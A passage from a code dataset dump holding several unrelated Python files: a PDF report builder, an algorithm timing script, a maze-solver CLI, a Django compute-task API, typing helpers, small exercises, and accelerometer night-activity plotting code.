\"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (0, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (0, 0), (-1, 0)),\n ]\n )\n style_table_group = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 15),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\"GRID\", (0, 0), (-1, -1), 0.5, colors.black),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (0, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (2, 0), (-1, 0)),\n ]\n )\n\n table_width = 5 * [2 * inch]\n for _, item_data in info.items():\n for subject_name, subject_data in item_data.items():\n data = list()\n data.append([textwrap.fill(subject_name, 60), \"\", \"\", \"\"])\n tbl = Table(data, colWidths=table_width)\n tbl.setStyle(style_table)\n flowables.append(tbl)\n for group_name, group_data in subject_data.items():\n for semester, semester_data in group_data.items():\n data = list()\n data.append(\n [\n group_name,\n f\"{semester} Семестр\",\n f\"{list(semester_data.items())[0][1]['number_of_students']} Студент(ов)\",\n \"\",\n ]\n )\n tbl = Table(data, colWidths=table_width)\n tbl.setStyle(style_table_group)\n flowables.append(tbl)\n for holding_type, holding_data in semester_data.items():\n amount = 1\n if (\n holding_type == \"Лабораторная работа\"\n and holding_data[\"number_of_students\"] >= 14\n ):\n amount = 2\n for _ in range(amount):\n style_table_type = TableStyle(\n [\n (\"FONTSIZE\", (0, 0), (-1, -1), 14),\n (\"FONTNAME\", (0, 0), (-1, -1), \"Russian\"),\n (\n \"GRID\",\n (0, 0),\n (-1, -1),\n 0.5,\n colors.black,\n ),\n (\"BOTTOMPADDING\", (0, 0), (-1, -1), 10),\n (\"ALIGN\", (0, 0), (0, -1), \"CENTER\"),\n (\"VALIGN\", (0, 0), (-1, -1), \"MIDDLE\"),\n (\"SPAN\", (2, 0), (-1, 0)),\n ]\n )\n data = list()\n data.append(\n [\n textwrap.fill(holding_type, 20),\n f\"{holding_data['total_time']} Час(ов)\",\n textwrap.fill(holding_data[\"teacher\"], 20)\n if holding_data[\"teacher\"] is not None\n else \"Нет\",\n \"\",\n ]\n )\n if holding_data[\"teacher\"] is not None:\n style_table_type.add(\n \"BACKGROUND\",\n (0, 0),\n (-1, -1),\n colors.palegreen,\n )\n else:\n style_table_type.add(\n \"BACKGROUND\", (0, 0), (-1, -1), colors.pink\n )\n tbl = Table(data, colWidths=table_width)\n tbl.setStyle(style_table_type)\n flowables.append(tbl)\n\n doc.build(flowables)\n return buffer\n","repo_name":"EfremovEgor/AcademyLoadCalculatorDjango","sub_path":"src/website/pdf_converter.py","file_name":"pdf_converter.py","file_ext":"py","file_size_in_byte":14880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9063719933","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''\n MAC0122 Principios de Desenvolvimento de Algoritmos\n \n Problema da fatia de soma maxima: \n\n dado: uma lista v de números inteiros;\n encontrar: uma fatia v[e:d] de soma máxima.\n'''\n# importa todas as funções do módul fatiamax\nfrom fatia import *\n\n# para o cronômetro\nimport time\n\n# para o gerador de numeros aleatórios\nimport random\n\n#------------------------------------------------------\n# CONSTANTES\n\n# numero de elementos\nNMIN = 0x0100 # = 4096 \nNMAX = 0x80000#00 # = 134217728 ~ 135 milhões\n\n# semente default para o gerador de no. aleatorios\nSEMENTE = 1234567\n\n# no. de experimentos default.\nNO_EXPERIMENTOS = 1\n\n# para testes\nMOSTRE = False\n\n#\nMIN = -4096\nMAX = 4096\n\n#------------------------------------------------------\ndef main(argv=None):\n #------------------------------------------------\n # valores default para os parâmetros\n semente = SEMENTE # para o gerador de numeros aleatorios \n no_experimentos = 1 # número de repeticoes de uma função\n max = NMAX # numero maximo de elementos da lista \n min = NMIN # numero mínimo de elementos na lista\n \n # inicialize a semente do gerador de numeros aleatorios \n random.seed(semente)\n\n # crie uma vetor com lista de max ints\n print(\"Criando lista com %d ints\" %max)\n v = lista_int_rand(max)\n print(\"Lista criada.\\n\")\n\n # para teste\n if MOSTRE:\n print(\"semente = %d\" %(semente))\n mostre_lista(v)\n\n # imprima cabeçalho \n print(\" n \", end=\"\")\n print(\" div_conq \", end=\"\")\n print(\" fatia_max \\n\", end=\"\")\n\n n = min\n while n <= max:\n # cronometre algoritmo por divisão e conquista\n inicio = time.time()\n soma_max1, e1, d1 = fatia_max_div_conq(0, n, v)\n fim = time.time()\n t1 = fim-inicio\n \n # cronometre algoritmo quadrático\n inicio = time.time()\n soma_max2, e2, d2 = fatia_max(0, n, v)\n fim = time.time()\n t2 = fim-inicio\n\n print(\"%10d\" %n, end=\"\")\n print(\"%11.2fs \"%t1, end=\"\")\n print(\"%11.2fs\\n\"%t2, end=\"\")\n\n if soma_max1 != soma_max2:\n print(\"SOCORRO! soma_max1 = %s != %s soma_max2\"%(soma_max1,soma_max2))\n \n # proximo valor de n\n n *= 2\n\n#------------------------------------------------------------\n# F U N C O E S A U X I L I A R E S \n#------------------------------------------------------------\ndef lista_int_rand(n):\n '''(int) -> list\n\n Recebe um inteiro não nagtivo n e cria e retorna uma \n lista com n número inteiros gerados aleatoriamente no\n intervalo [MIN,MAX[.\n '''\n lista = []\n for i in range(n):\n valor = random.randrange(MIN,MAX)\n lista.append(valor)\n return lista\n\n#------------------------------------------------------------\ndef mostre_lista(v):\n '''(list) -> None\n\n Recebe uma lista v de números inteiros e mostra o seu conteudo\n de uma maneira conveniente.\n '''\n print(\"Lista:\")\n n = len(v)\n for i in range(n):\n print(\"%8d: %d\" %(i,v[i]))\n\n\n#----------------------------------------------------------- \nif __name__ == \"__main__\":\n main()\n \n'''\n n div_conq fatia_max \n 256 0.00s 0.00s\n 512 0.00s 0.01s\n 1024 0.00s 0.04s\n 2048 0.00s 0.16s\n 4096 0.01s 0.62s\n 8192 0.02s 2.45s\n 16384 0.04s 9.82s\n 32768 0.08s 39.37s\n 65536 0.16s 161.20s\n 131072 0.33s 663.06s\n 262144 0.68s 2581.96s\n 524288 1.40s 10163.39s\n'''\n \n \n","repo_name":"HelloWounderworld/Review-Python","sub_path":"O-que-Fiz-Na-Faculdade/MAC2/EPs-MAC2/EPX2/Cronometro.py","file_name":"Cronometro.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37108707677","text":"\"\"\"\nCLI entry point for the maze solver.\n\"\"\"\n\nimport argparse\n\nfrom character.bfspentti import BFSPentti\nfrom character.randompentti import RandomPentti\nfrom character.righthandpentti import RightHandPentti\nfrom character.usablepentti import UsablePentti\nfrom map.map import Map\nfrom map.maptoimage import MapToImage\n\n\nparser = argparse.ArgumentParser(description=\"CLI to helping Pentti escape his doom.\")\nparser.add_argument(\n \"-m\",\n \"--map\",\n type=str,\n required=True,\n dest=\"map\",\n help=\"Path to a map text file\",\n)\nparser.add_argument(\n \"-p\",\n \"--pentti\",\n required=True,\n choices=[\"random\", \"righthandrule\", \"bfs\"],\n dest=\"pentti\",\n help=\"Which solving algorithm to use\",\n)\nparser.add_argument(\n \"-l\",\n \"--limit\",\n required=False,\n type=int,\n dest=\"limit\",\n help=\"Limit Pentti's available moves\",\n default=1000,\n)\nparser.add_argument(\n \"-i\",\n \"--image\",\n action=\"store_true\",\n dest=\"image\",\n help=\"Prints the solution as 'solution.png'\"\n)\nparser.add_argument(\n \"-g\",\n \"--gif\",\n action=\"store_true\",\n dest=\"gif\",\n help=\"Prints the solution steps as 'solution.gif'\"\n)\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n pentti: UsablePentti = None\n map = Map(args.map)\n\n if args.pentti == \"random\":\n pentti = RandomPentti(map)\n if args.pentti == \"righthandrule\":\n pentti = RightHandPentti(map)\n if args.pentti == \"bfs\":\n pentti = BFSPentti(map)\n\n pentti.escape_maze(args.limit)\n\n if args.gif:\n maptoimage = MapToImage()\n maptoimage.convert(pentti._history + [pentti._map])\n maptoimage.save_images_as_gif()\n\n if args.image:\n maptoimage = MapToImage()\n maptoimage.convert([pentti._map])\n maptoimage.save_last_png()\n","repo_name":"Mnsk44/pentti-the-escape-artist","sub_path":"escapeartist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27494096099","text":"import structlog\nfrom django.db import models\nfrom django.db.models.expressions import RawSQL\nfrom django.db.models.functions import Coalesce\nfrom django.db.models.functions import Extract\nfrom django.db.models.functions import JSONObject\nfrom django.db.models.functions import Now\nfrom django_filters.rest_framework import BaseInFilter\nfrom django_filters.rest_framework import CharFilter\nfrom django_filters.rest_framework import DateTimeFromToRangeFilter\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django_filters.rest_framework import FilterSet\nfrom django_filters.rest_framework import RangeFilter\nfrom rest_framework import mixins\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.filters import OrderingFilter\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom api.errors import AlreadyExistsError\nfrom api.errors import BadRequestError\nfrom api.models import ComputePlan\nfrom api.models import ComputeTask\nfrom api.models import ComputeTaskInputAsset\nfrom api.models import ComputeTaskOutputAsset\nfrom api.models.function import FunctionInput\nfrom api.models.function import FunctionOutput\nfrom api.serializers import ComputeTaskInputAssetSerializer\nfrom api.serializers import ComputeTaskOutputAssetSerializer\nfrom api.serializers import ComputeTaskSerializer\nfrom api.views.filters_utils import CharInFilter\nfrom api.views.filters_utils import ChoiceInFilter\nfrom api.views.filters_utils import MatchFilter\nfrom api.views.filters_utils import MetadataFilterBackend\nfrom api.views.utils import ApiResponse\nfrom api.views.utils import get_channel_name\nfrom api.views.utils import validate_key\nfrom api.views.utils import validate_metadata\nfrom libs.pagination import DefaultPageNumberPagination\nfrom orchestrator import computetask\nfrom orchestrator.resources import TAG_KEY\nfrom substrapp.orchestrator import get_orchestrator_client\n\nlogger = structlog.get_logger(__name__)\n\n\ndef _register_in_orchestrator(tasks_data, channel_name):\n \"\"\"Register computetask in orchestrator.\"\"\"\n batch = {}\n for task_data in tasks_data:\n orc_task = {\n \"key\": task_data[\"key\"],\n \"function_key\": task_data.get(\"function_key\"),\n \"compute_plan_key\": task_data[\"compute_plan_key\"],\n \"inputs\": task_data.get(\"inputs\", []),\n \"outputs\": task_data.get(\"outputs\", {}),\n \"metadata\": task_data.get(\"metadata\") or {},\n }\n\n validate_metadata(orc_task[\"metadata\"])\n orc_task[\"metadata\"][TAG_KEY] = task_data.get(\"tag\") or \"\"\n\n if \"worker\" in task_data:\n orc_task[\"worker\"] = task_data[\"worker\"]\n\n batch[orc_task[\"key\"]] = orc_task\n\n with get_orchestrator_client(channel_name) as client:\n return client.register_tasks({\"tasks\": list(batch.values())})\n\n\ndef task_bulk_create(request):\n \"\"\"Create a batch of tasks (with various categories) with same CP keys\n\n The workflow is composed of several steps:\n - Register assets in the orchestrator.\n - Save metadata in local database.\n \"\"\"\n\n # Step1: register asset in orchestrator\n compute_plan_keys = [task[\"compute_plan_key\"] for task in request.data[\"tasks\"]]\n compute_plans = ComputePlan.objects.filter(key__in=compute_plan_keys)\n if len(compute_plans) == 0:\n raise BadRequestError(\"Invalid compute plan key\")\n if len(compute_plans) > 1:\n raise BadRequestError(\"All tasks should have the same compute plan key\")\n compute_plan = compute_plans[0]\n orc_data = _register_in_orchestrator(request.data[\"tasks\"], get_channel_name(request))\n\n # Step2: save metadata in local database\n data = []\n for task in orc_data:\n api_data = computetask.orc_to_api(task)\n api_data[\"channel\"] = get_channel_name(request)\n api_serializer = ComputeTaskSerializer(data=api_data)\n try:\n api_serializer.save_if_not_exists()\n except AlreadyExistsError:\n # May happen if the events app already processed the event pushed by the orchestrator\n compute_task = ComputeTask.objects.get(key=api_data[\"key\"])\n api_task_data = ComputeTaskSerializer(compute_task).data\n else:\n api_task_data = api_serializer.data\n data.append(api_task_data)\n\n compute_plan.update_dates()\n compute_plan.update_status()\n return ApiResponse(data, status=status.HTTP_200_OK)\n\n\ndef validate_status_and_map_cp_key(key, values):\n if key == \"status\":\n try:\n for value in values:\n getattr(ComputeTask.Status, value)\n except AttributeError as e:\n raise BadRequestError(f\"Wrong {key} value: {e}\")\n elif key == \"compute_plan_key\":\n key = \"compute_plan_id\"\n return key, values\n\n\nclass ComputePlanKeyOrderingFilter(OrderingFilter):\n \"\"\"Allow ordering on compute_plan_key.\"\"\"\n\n def get_ordering(self, request, queryset, view):\n ordering = super().get_ordering(request, queryset, view)\n return [v.replace(\"compute_plan_key\", \"compute_plan_id\") for v in ordering]\n\n\nclass ComputeTaskMetadataFilter(MetadataFilterBackend):\n def _apply_filters(self, queryset, filter_keys):\n return queryset.annotate(\n metadata_filters=JSONObject(\n **{\n f\"{filter_key}\": RawSQL(\n \"api_computetask.metadata ->> %s\",\n (filter_key,),\n )\n for filter_key in filter_keys\n }\n )\n )\n\n\nclass ComputeTaskFilter(FilterSet):\n creation_date = DateTimeFromToRangeFilter()\n start_date = DateTimeFromToRangeFilter()\n end_date = DateTimeFromToRangeFilter()\n status = ChoiceInFilter(\n field_name=\"status\",\n choices=ComputeTask.Status.choices,\n )\n compute_plan_key = CharInFilter(field_name=\"compute_plan__key\")\n function_key = CharFilter(field_name=\"function__key\", distinct=True, label=\"function_key\")\n duration = RangeFilter(label=\"duration\")\n\n class Meta:\n model = ComputeTask\n fields = {\n \"key\": [\"exact\"],\n \"owner\": [\"exact\"],\n \"rank\": [\"exact\"],\n \"worker\": [\"exact\"],\n \"tag\": [\"exact\"],\n }\n filter_overrides = {\n models.CharField: {\n \"filter_class\": BaseInFilter,\n \"extra\": lambda f: {\n \"lookup_expr\": \"in\",\n },\n },\n models.IntegerField: {\n \"filter_class\": BaseInFilter,\n \"extra\": lambda f: {\n \"lookup_expr\": \"in\",\n },\n },\n models.UUIDField: {\n \"filter_class\": BaseInFilter,\n \"extra\": lambda f: {\n \"lookup_expr\": \"in\",\n },\n },\n }\n\n\nclass InputAssetFilter(FilterSet):\n kind = ChoiceInFilter(field_name=\"asset_kind\", choices=FunctionInput.Kind.choices)\n identifier = CharInFilter(field_name=\"task_input__identifier\")\n\n class Meta:\n model = ComputeTaskInputAsset\n fields = [\"kind\", \"identifier\"]\n\n\nclass OutputAssetFilter(FilterSet):\n kind = ChoiceInFilter(field_name=\"asset_kind\", choices=FunctionOutput.Kind.choices)\n identifier = CharInFilter(field_name=\"task_output__identifier\")\n\n class Meta:\n model = ComputeTaskOutputAsset\n fields = [\"kind\", \"identifier\"]\n\n\nclass ComputeTaskViewSetConfig:\n filter_backends = (ComputePlanKeyOrderingFilter, MatchFilter, DjangoFilterBackend, ComputeTaskMetadataFilter)\n ordering_fields = [\n \"creation_date\",\n \"start_date\",\n \"end_date\",\n \"key\",\n \"owner\",\n \"rank\",\n \"status\",\n \"function__name\",\n \"tag\",\n \"compute_plan_key\",\n \"duration\",\n ]\n ordering = [\"creation_date\", \"key\"]\n pagination_class = DefaultPageNumberPagination\n search_fields = (\"key\",)\n filterset_class = ComputeTaskFilter\n\n\nclass ComputeTaskViewSet(ComputeTaskViewSetConfig, mixins.RetrieveModelMixin, mixins.ListModelMixin, GenericViewSet):\n serializer_class = ComputeTaskSerializer\n\n @action(methods=[\"post\"], detail=False, url_name=\"bulk_create\")\n def bulk_create(self, request, *args, **kwargs):\n return task_bulk_create(request)\n\n @action(detail=True, url_name=\"input_assets\")\n def input_assets(self, request, pk):\n input_assets = ComputeTaskInputAsset.objects.filter(task_input__task_id=pk).order_by(\n \"task_input__identifier\", \"task_input__position\"\n )\n input_assets = InputAssetFilter(request.GET, queryset=input_assets).qs\n\n context = {\"request\": request}\n page = self.paginate_queryset(input_assets)\n if page is not None:\n serializer = ComputeTaskInputAssetSerializer(page, many=True, context=context)\n return self.get_paginated_response(serializer.data)\n\n serializer = ComputeTaskInputAssetSerializer(input_assets, many=True, context=context)\n return ApiResponse(serializer.data)\n\n @action(detail=True, url_name=\"output_assets\")\n def output_assets(self, request, pk):\n output_assets = ComputeTaskOutputAsset.objects.filter(task_output__task_id=pk).order_by(\n \"task_output__identifier\"\n )\n output_assets = OutputAssetFilter(request.GET, queryset=output_assets).qs\n\n context = {\"request\": request}\n page = self.paginate_queryset(output_assets)\n if page is not None:\n serializer = ComputeTaskOutputAssetSerializer(page, many=True, context=context)\n return self.get_paginated_response(serializer.data)\n\n serializer = ComputeTaskOutputAssetSerializer(output_assets, many=True, context=context)\n return ApiResponse(serializer.data)\n\n def get_queryset(self):\n return (\n ComputeTask.objects.filter(channel=get_channel_name(self.request))\n .select_related(\"function\")\n .prefetch_related(\"inputs\", \"outputs\", \"function__inputs\", \"function__outputs\")\n .annotate(\n # Using 0 as default value instead of None for ordering purpose, as default\n # Postgres behavior considers null as greater than any other value.\n duration=models.Case(\n models.When(start_date__isnull=True, then=0),\n default=Extract(Coalesce(\"end_date\", Now()) - models.F(\"start_date\"), \"epoch\"),\n )\n )\n )\n\n\nclass CPTaskViewSet(ComputeTaskViewSetConfig, mixins.ListModelMixin, GenericViewSet):\n serializer_class = ComputeTaskSerializer\n\n def get_queryset(self):\n compute_plan_key = self.kwargs.get(\"compute_plan_pk\")\n validate_key(compute_plan_key)\n\n return (\n ComputeTask.objects.filter(channel=get_channel_name(self.request))\n .filter(compute_plan__key=compute_plan_key)\n .select_related(\"function\")\n .prefetch_related(\"function__inputs\", \"function__outputs\", \"inputs\", \"outputs\")\n .annotate(\n # Using 0 as default value instead of None for ordering purpose, as default\n # Postgres behavior considers null as greater than any other value.\n duration=models.Case(\n models.When(start_date__isnull=True, then=0),\n default=Extract(Coalesce(\"end_date\", Now()) - models.F(\"start_date\"), \"epoch\"),\n )\n )\n )\n","repo_name":"Substra/substra-backend","sub_path":"backend/api/views/computetask.py","file_name":"computetask.py","file_ext":"py","file_size_in_byte":11538,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"74179504514","text":"from functools import partial as _partial\nimport typing as _t\n\n\ndef instance_of(*types: type) -> _t.Callable[[_t.Any], bool]:\n \"\"\"\n Creates predicate that checks if object is instance of given types.\n\n >>> is_any_string = instance_of(str, bytes, bytearray)\n >>> is_any_string(b'')\n True\n >>> is_any_string('')\n True\n >>> is_any_string(1)\n False\n \"\"\"\n non_types = [candidate\n for candidate in types\n if not isinstance(candidate, type)]\n if non_types:\n raise TypeError(non_types)\n return _partial(_is_instance_of,\n types=types)\n\n\ndef subclass_of(*types: type) -> _t.Callable[[type], bool]:\n \"\"\"\n Creates predicate that checks if type is subclass of given types.\n\n >>> is_metaclass = subclass_of(type)\n >>> is_metaclass(type)\n True\n >>> is_metaclass(object)\n False\n \"\"\"\n non_types = [candidate\n for candidate in types\n if not isinstance(candidate, type)]\n if non_types:\n raise TypeError(non_types)\n return _partial(_is_subclass_of,\n types=types)\n\n\ndef _is_instance_of(value: _t.Any, types: _t.Tuple[type, ...]) -> bool:\n return isinstance(value, types)\n\n\ndef _is_subclass_of(value: type, types: _t.Tuple[type, ...]) -> bool:\n return issubclass(value, types)\n","repo_name":"lycantropos/lz","sub_path":"lz/typology.py","file_name":"typology.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"18541308037","text":"from cs50 import get_int\n\n\nwhile True:\n n = get_int('Height: ')\n\n # Wait for corret input\n if n in range(1, 9):\n # Print the pyramid\n for x in range(1, n + 1):\n print((' ' * (n - x)) + ('#' * x) + ' ' + ('#' * x))\n quit()\n","repo_name":"cbraissant/cs50","sub_path":"pset6/mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23969633890","text":"from tkinter import *\nfrom PIL import Image, ImageTk\nfrom tkinter.ttk import *\nimport tkinter as tk\n\nroot = tk.Tk()\nroot.geometry(\"320x240\")\nroot.title(\"Cash Safe\")\n\n\n\n# Root background info\nlight_blue = (84, 140, 230)\ncolor_string = \"#%02x%02x%02x\" % light_blue\ncanvas = tk.Canvas(root, bg=color_string, width=320, height=240)\ncanvas.pack(expand=True)\n\n#Coin info\ncoin1 = canvas.create_oval(50, 50, 100, 100, fill=\"gold\", outline=\"yellow\")\ncoin2 = canvas.create_oval(20, 20, 100, 100, fill=\"gold\")\ncoin3 = canvas.create_oval(50, 50, 100, 100, fill=\"gold\")\n#coin1.place(padx=50, pady=20)\n\nroot.mainloop()\n","repo_name":"Idanlau/TheftDetection","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2452670900","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.lines import Line2D\nimport datetime\n\ndef plot_data(df, fig_title):\n dates_list = df['Date'].unique().tolist()\n print(dates_list, len(dates_list), type(dates_list))\n\n fig, axes = plt.subplots(nrows=3, ncols=3, subplot_kw={'ylim': (0,250)})\n fig.canvas.set_window_title(fig_title)\n fig.suptitle(fig_title, fontsize=16)\n row=0\n col=0\n for day_now, day_next in zip(dates_list, dates_list[1:]):\n df_night_part0 = df.loc[(df['Date']==day_now) & (df[' Time']>='22:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n df_night_part1 = df.loc[(df['Date']==day_next) & (df[' Time']<='10:00:00'), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n df_night = pd.concat([df_night_part0, df_night_part1], ignore_index=True) \n\n df_night.plot(x=' Time', y='Vector Magnitude', title='', ax=axes[row,col])\n col+=1\n if col==3:\n col=0\n row+=1\n else:\n pass\n \n return\n\n\ndef getSelectedData(df, time0, time1, same_day):\n\n dates_list = df['Date'].unique().tolist()\n print(dates_list, len(dates_list), type(dates_list))\n\n names_columns = df.columns.tolist()\n names_columns.append('night')\n\n # print(names_columns)\n\n # empty dataframe initialization\n df_all = pd.DataFrame(columns=names_columns)\n\n cont_nights=0\n if same_day==False:\n for day_now, day_next in zip(dates_list, dates_list[1:]):\n df_night_part0 = df.loc[(df['Date']==day_now) & (df[' Time']>=time0), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n df_night_part1 = df.loc[(df['Date']==day_next) & (df[' Time']<=time1), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n df_night = pd.concat([df_night_part0,df_night_part1], ignore_index=True)\n df_night['night']=cont_nights\n # print('night number ', cont_nights)\n # print(df_night.info())\n # print(df_night.head)\n cont_nights+=1\n\n # adding a column number of nights\n\n df_all=pd.concat([df_all, df_night], ignore_index=True)\n # print(df_all.info())\n # print(df_all.head)\n else:\n for day_now in dates_list:\n df_night = df.loc[(df['Date']==day_now) & (df[' Time']>=time0) & (df[' Time']<=time1), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n # df_night_part1 = df.loc[(df['Date']==day_next) & (df[' Time']<=time1), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n # df_night = df_night_part0.append(df_night_part1)\n df_night['night']=cont_nights\n # print('night number ', cont_nights)\n # print(df_night.info())\n # print(df_night.head)\n cont_nights+=1\n\n # adding a column number of nights\n\n df_all=pd.concat([df_all, df_night], ignore_index=True)\n # print(df_all.info())\n # print(df_all.head)\n\n return df_all \n\n\ndef plot_nights(df1,df2):\n nights_list = df1['night'].unique().tolist()\n # print('nights: ', nights_list)\n fig, axes = plt.subplots(nrows=2, ncols=1)\n # fig.suptitle('Vector Magnitude', fontsize=12)\n # fig.subplots_adjust(wspace=0, hspace=10)\n # fig, axes = plt.subplots(subplot_kw={'ylim': (0,150)})\n\n ax1 = axes[0]\n # ax1.set_ylabel('counts')\n # ax1.set_xlabel('')\n # ax1.set_ylim(0, 200)\n # ax1.legend([\"chest\"])\n\n ax2 = axes[1]\n # ax2.set_ylabel('counts')\n # ax2.set_ylim(0, 200)\n # ax2.legend([\"thigh\"])\n\n\n for night_num in nights_list[:1]:\n df1_night = df1.loc[(df1['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n df2_night = df2.loc[(df2['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n\n print('length column Time:', len(df1_night[' Time']))\n xmin = 0 \n xmax = len(df1_night[' Time'])\n\n # presenting xticks in hh:mm format\n xdelta = 3600 # seconds in one hour\n xticks = np.arange(xmin,xmax,xdelta)\n hours = np.floor(xticks/3600).astype(int)\n mins = np.floor(np.remainder(xticks,3600)/60).astype(int)\n xlabels = [str(i)+':'+str(j) for i, j in zip(hours, mins)]\n xlabels_2 = xlabels.copy()\n xlabels_2[0] = xlabels[0]+'\\n22h00'\n xlabels_2[-1] = xlabels[-1]+'\\n10h00'\n print(hours)\n print(mins)\n print(xlabels)\n # xlabels = np.around(xrange/3600,decimals=2)\n ymin = 0\n ymax = 210\n ylabel = 'counts (1s epoch)'\n xlabel = 'time (hh:mm)'\n # bx1=df1_night.plot(x=' Time', y='Vector Magnitude', ax=ax1, alpha=1.0, xlabel='', xticks=(np.arange(0, len(df1_night[' Time'])+1, 3600)))\n bx1=df1_night.plot(x=' Time', y='Vector Magnitude', ax=ax1, alpha=1.0)\n bx1.set_xlim([xmin, xmax])\n bx1.set_ylim([ymin, ymax])\n bx1.set_xticks(xticks)\n bx1.set_xticklabels(xlabels)\n bx1.set_ylabel(ylabel)\n bx1.set_xlabel('')\n bx1.set_title(\"Vector Magnitude\")\n bx1.legend([\"chest\"])\n # bx1.set_xticklabels(np.arange(0, len(df1_night[' Time'])+1, 3600))\n \n # print([xlabels[0]+'\\n22h00', xlabels[1:-1], xlabels[-1]+'\\n10h00'])\n # bx1.xlabel('')\n bx2=df2_night.plot(x=' Time', y='Vector Magnitude', ax=ax2, alpha=1.0)\n bx2.set_xlim([xmin, xmax])\n bx2.set_ylim([ymin, ymax])\n bx2.set_xticks(xticks)\n bx2.set_xticklabels(xlabels_2)\n bx2.set_ylabel(ylabel)\n bx2.set_xlabel(xlabel)\n bx2.legend([\"thigh\"])\n # bx2.set_title(\"Vector Magnitude : Thigh\")\n\n # bx2.set_xticks(np.arange(0, 12, step=0.2), np.arange(0, 12, step=0.2))\n # xticks(np.arange(0, 1, step=0.2))\n # bx2.xlabel('Time (h)')\n # bx1=df1_night.plot(x=' Time', y='Vector Magnitude', alpha=0.5, ax=axes, label='chest')\n # bx1.legend([\"chest\"])\n # bx2=df2_night.plot(x=' Time', y='Vector Magnitude', alpha=0.5, ax=axes, label='thigh')\n # bx2.legend([\"thigh\"])\n # df_night.plot(x=' Time', y='Vector Magnitude', , ax=axes[row,col])\n return\n\n# def plot_nights_2(df1,df2):\n# nights_list = df1['night'].unique().tolist()\n# # print('nights: ', nights_list)\n# fig, axes = plt.subplots(nrows=2, ncols=1, subplot_kw={'ylim': (0,250)})\n \n# ax1 = axes[0]\n# ax1.set_ylabel('counts')\n# ax1.set_ylim(0, 250)\n\n# ax2 = axes[1]\n# ax2.set_ylabel('counts')\n# ax2.set_ylim(0, 250)\n\n# for night_num in nights_list[:1]:\n# df1_night = df1.loc[(df1['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n# df2_night = df2.loc[(df2['night']==night_num), ['Date',' Time',' Axis1','Axis2','Axis3','Vector Magnitude']]\n \n# df1_night.plot(x=' Time', y='Vector Magnitude', ax=ax1, label='magnitude (chest)')\n# df2_night.plot(x=' Time', y='Vector Magnitude', ax=ax2, label='magnitude (thigh)')\n# # df_night.plot(x=' Time', y='Vector Magnitude', , ax=axes[row,col])\n# return\n\n\ndef non_motion_periods(mag_col):\n # nights_list = df['night'].unique().tolist()\n min_value = 3\n # for night_num in nights_list[:1]:\n # mag_col = df.loc[(df['night']==night_num), ['Vector Magnitude']]\n\n mag_col['active'] = mag_col['Vector Magnitude'] > min_value\n\n active_arrray = mag_col['active'].to_numpy()\n print(active_arrray)\n changes_array = active_arrray[:-1] != active_arrray[1:]\n print(changes_array)\n idx_changes = np.flatnonzero(changes_array)\n print(idx_changes)\n # print(active_arrray[idx_changes])\n intervals = idx_changes[1:]-idx_changes[:-1]\n print(intervals)\n\n initial_value = [idx_changes[0] + 1]\n if active_arrray[idx_changes[0]]==False:\n duration_active = intervals[::2]\n duration_inactive = np.concatenate([initial_value, intervals[1::2]])\n else:\n duration_active = np.concatenate([initial_value, intervals[1::2]])\n duration_inactive = intervals[::2]\n\n print(duration_active)\n print(duration_inactive)\n \n return duration_active, duration_inactive\n\n\n# histograms\ndef activityHistogram(activity, inactivity):\n\n # print(type(activity))\n binwidth=1\n # plt.hist(activity, bins=range(min(activity), max(activity) + binwidth, binwidth))\n # plt.hist(inactivity, bins=range(min(inactivity), max(inactivity) + binwidth, binwidth))\n plt.hist(inactivity) # density=False would make counts\n plt.ylabel('Probability')\n plt.xlabel('Data')\n\n return\n\n\n\n\n # print(mag_col.info())\n # print(mag_col.describe())\n # print(mag_col.head)\n # mag_array = mag_col.to_numpy()\n # print('vector magnitud: ', len(mag_array), mag_array[0], mag_array[0][0])\n # # find first value non-zero in the list\n # min_value = 3\n # count=0\n # while mag_array[count][0] < min_value:\n # count+=1\n # print('count: 